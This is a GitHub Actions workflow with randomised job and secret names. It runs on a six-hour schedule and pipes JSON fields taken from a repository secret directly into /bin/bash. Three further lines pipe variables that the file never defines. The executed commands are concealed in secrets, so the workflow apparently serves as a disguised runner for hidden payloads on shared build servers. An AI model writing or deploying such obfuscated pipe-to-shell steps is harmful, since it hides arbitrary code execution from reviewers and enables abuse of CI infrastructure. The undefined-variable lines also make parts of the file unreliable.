name: zhanxugang9871
on:
  workflow_dispatch:
  schedule:
    - cron: '13 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhanxugang9871
        env:
          w61786: ${{ secrets.w61786 }}
        run: |
          echo $w61786 | jq -r .cbob34197 | /bin/bash
          echo $k60 | jq -r .fzm6 | /bin/bash
          echo $suode9 | jq -r .maka15171 | /bin/bash
          echo $ewrs82884 | jq -r .ie88048 | /bin/bash

